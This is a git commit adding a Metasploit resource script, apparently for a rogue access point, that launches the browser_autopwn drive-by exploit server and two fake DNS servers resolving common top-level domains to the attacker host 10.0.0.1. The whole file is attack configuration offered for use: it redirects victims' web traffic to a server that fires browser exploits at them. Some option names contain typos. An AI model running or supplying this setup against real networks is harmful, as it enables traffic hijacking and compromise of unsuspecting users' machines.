New rc file for Autopwn 1

This commit is contained in:
Francesco Grotti
2016-11-29 15:39:27 +01:00
committed by GitHub
parent 206555bca9
commit 7ceaae77f4

29
roguepwn1.rc Normal file
View File

@@ -0,0 +1,29 @@
use auxiliary/server/browser_autopwn
set AUTOPWN_HOST 10.0.0.1
set AUTOPWN_PORT 80
set AUTOPWN_URI /
set LPORT 45000
set SRVHOST 10.0.0.1
set SRVPORT 80
set URIPATH /
run -j
use auxiliary/server/fakedns
set LogConsole false
set TARGETHOST 10.0.0.1
set SRVHOST 10.0.0.1
set TAGETDOMAIN *.com, *.org, *.it, *.net, *.edu. *.fr
set TARGET ACTION BYPASS
set SRVPORT 5353
run -j
use auxiliary/server/fakedns
set LogConsole false
set TARGETHOST 10.0.0.1
set SRVHOST 10.0.0.1
set TAGETDOMAIN *.com, *.org, *.it, *.net, *.edu, *.fr
set TARGET ACTION BYPASS
set SRVPORT 53
run -j